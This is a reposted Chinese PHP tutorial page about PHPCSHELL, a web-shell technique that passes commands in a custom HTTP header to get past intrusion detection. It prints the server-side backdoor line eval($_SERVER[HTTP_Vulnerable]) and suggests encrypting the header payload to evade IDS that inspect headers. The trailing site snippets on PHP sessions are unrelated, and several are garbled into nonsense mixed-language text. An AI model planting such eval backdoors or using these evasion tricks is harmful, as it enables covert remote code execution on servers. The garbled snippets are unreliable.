基于Http Header 的PHP C/S Shell_PHP教程-php教程-PHP中文網

首頁

後端開發

php教程

基于Http Header 的PHP C/S Shell_PHP教程

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 pm 05:34 PM

455headerhttpphpshell作者基於的

http://www.vul.kr/?p=455 作者：TTFCT

06年时，发现HTTP HEADER可自定义，插入指定代码，06年8月份成功完成PHPCSHELL C/S TOOL,之后一直使用此TOOL 绕过IDS，07年曾遇到使用 WSC POST提交不能成功连接的情况，而使用 PHPCSHELL 成功连上，之后一直使用，隐蔽性很好。

说了那么多，该阐述一下PHPCSHELL原理了：

先让我们来看一段 HTTP HEADER

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Connection: Keep-Alive
Cookie: www.vul.kr

HTTP HEADER包含Accept，Accept-Language,User-Agent,Host等信息，我两年前曾发表过一篇文章是关于BBSXP，通过修改User-Agent来实现注入，除了修改外，还可以对 HTTP HEADER增加项，如我们增加:
vulnerable:welcome to www.vul.kr

完整的HTTP HEADER如下：

在服务端，接收代码如下：
echo ($_SERVER[HTTP_Vulnerable]);
?>

将HTTP封包NC 提交后，成功显示 "welcome to www.vul.kr",这样就取得了HTTP头我们自定义的信息，POST,GET的提交数据可以做成一句话，当然，HTTP HEADER封包提交也可以，而且可以绕过某些IDS，这也是我为什么一直使用PHPCSHELL的原因。

如果服务端变为：

eval($_SERVER[HTTP_Vulnerable]);
?>

是不是就变成了典型的一句话了：）
有些IDS很BT，会检查HTTP HEADER，要绕过，还是有方法的，提示一点：封包加密，服务端解密再执行。

PHPCSHELL图，本来想做成和WSC功能一样的，但是工作量太大，没时间写。

PS: HTTP HEADER提交有字符限制，允许字符数长度：8184.

最后欢迎大家前往 http://www.vul.kr

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

絕對會話超時有什麼區別？May 03, 2025 am 12:21 AM

絕對會話超時從會話創建時開始計時，閒置會話超時則從用戶無操作時開始計時。絕對會話超時適用於需要嚴格控制會話生命週期的場景，如金融應用；閒置會話超時適合希望用戶長時間保持會話活躍的應用，如社交媒體。

如果會話在服務器上不起作用，您將採取什麼步驟？May 03, 2025 am 12:19 AM

服務器會話失效可以通過以下步驟解決：1.檢查服務器配置，確保會話設置正確。 2.驗證客戶端cookies，確認瀏覽器支持並正確發送。 3.檢查會話存儲服務，如Redis，確保其正常運行。 4.審查應用代碼，確保會話邏輯正確。通過這些步驟，可以有效診斷和修復會話問題，提升用戶體驗。

session_start（）函數的意義是什麼？May 03, 2025 am 12:18 AM

session_start（）iscucialinphpformanagingusersessions.1）ItInitiateSanewsessionifnoneexists，2）resumesanexistingsessions，and3）setsasesessionCookieforContinuityActinuityAccontinuityAcconActInityAcconActInityAcconAccRequests，EnablingApplicationsApplicationsLikeUseAppericationLikeUseAthenticationalticationaltication and PersersonalizedContentent。

為會話cookie設置httponly標誌的重要性是什麼？May 03, 2025 am 12:10 AM

設置httponly標誌對會話cookie至關重要，因為它能有效防止XSS攻擊，保護用戶會話信息。具體來說，1）httponly標誌阻止JavaScript訪問cookie，2）在PHP和Flask中可以通過setcookie和make_response設置該標誌，3）儘管不能防範所有攻擊，但應作為整體安全策略的一部分。

PHP會議在網絡開發中解決了什麼問題？May 03, 2025 am 12:02 AM

phpsessions solvathepromblymaintainingStateAcrossMultipleHttpRequestsbyStoringDataTaNthEserVerAndAssociatingItwithaIniquesestionId.1）他們儲存了AtoredAtaserver side，通常是Infilesordatabases，InseasessessionIdStoreDistordStoredStoredStoredStoredStoredStoredStoreDoreToreTeReTrestaa.2）

可以在PHP會話中存儲哪些數據？May 02, 2025 am 12:17 AM

phpsessionscanStorestrings，數字，數組和原始物。

您如何開始PHP會話？May 02, 2025 am 12:16 AM

tostartaphpsession，usesesses_start（）attheScript'Sbeginning.1）placeitbeforeanyOutputtosetThesessionCookie.2）useSessionsforuserDatalikeloginstatusorshoppingcarts.3）regenerateSessiveIdStopreventFentfixationAttacks.s.4）考慮使用AttActAcks.s.s.4）